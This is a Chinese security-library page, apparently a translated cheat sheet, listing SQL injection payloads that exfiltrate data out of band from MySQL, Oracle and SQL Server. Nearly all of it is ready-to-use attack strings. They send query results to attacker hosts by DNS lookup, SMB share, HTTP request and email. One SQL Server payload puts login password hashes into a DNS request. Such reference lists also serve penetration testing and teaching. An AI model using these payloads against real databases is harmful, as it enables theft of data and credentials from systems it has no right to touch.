首页>安全文库>SQL注入>SQL注入数据泄露

SQL注入数据泄露

泄漏的数据以及任何受损数据的脱机副本可以用来做数据分析。数据可以通过文件,各种Layer 4请求和隐藏技术被泄漏。

* 需要特权用户

MySQL

描述语句
DNS 请求SELECT LOAD\_FILE(concat('\\\\',(QUERY\_WITH\_ONLY\_ONE\_ROW), 'yourhost.com\\'))
SMB 分享SELECT * FROM USERS INTO OUTFILE '\\attacker\SMBshare\output.txt'
HTTP 服务器SELECT * FROM USERS INTO OUTFILE '/var/www/html/output.txt'
数字连接SELECT length(user())
SELECT ASCII(substr(user(),1))
当数据只能作为数字导出时,转换为ASCII。 有关自动化点击此处连接.

Oracle

描述语句
将多行合并为一行SELECT dbms_xmlgen.getxmltype('select user from dual') FROM dual
XML外部实体SELECT xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://IP/test"> %remote; %param1;]>') FROM dual;
URL_HTTP 请求 (Pre-11gR2)SELECT UTL_HTTP.request ('http://IP/test') FROM dual;
避免特殊字符SELECT UTL_URL.escape('http://IP/' || USER) FROM dual;

SQL Server

注意:可以从MSSQL发出DNS请求。但是,此请求需要管理员权限和SQL Server 2005。

描述语句
制造DNS请求DECLARE @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + 'netspi.com' from sys.sql_logins;exec('xp_fileexist "\' + @host + 'c$boot.ini"');
UNC路径(DNS请求)xp_dirtree ‘\\data.domain.com\file’
启用sp_send_dbmail并发送查询sp_configure 'show advanced options', 1;RECONFIGURE;sp_configure 'Database Mail XPs', 1;RECONFIGURE;exec msdb..sp_send_dbmail @recipients='harold@netspi.com',@query='select @@version';
基本的xp_sendmail查询EXEC master..xp_sendmail 'harold@netspi.com', 'This is a test.'
使用xp_sendmail发送完整的电子邮件EXEC xp_sendmail @recipients='harold@netspi.com', @message='This is a test.', @copy_recipients='test@netspi.com', @subject='TEST'
通过xp_sendmail发送查询结果EXEC xp_sendmail 'harold@netspi.com', @query='SELECT @@version';
通过xp_sendmail发送查询结果作为附件CREATE TABLE ##texttab (c1 text) INSERT ##texttab values ('Put messge here.') DECLARE @cmd varchar(56)SET @cmd = 'SELECT c1 from ##texttab'EXEC master.dbo.xp_sendmail 'robertk',@query = @cmd, @no_header='TRUE'DROP TABLE ##texttab
文章最后更新于 2021-09-22
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索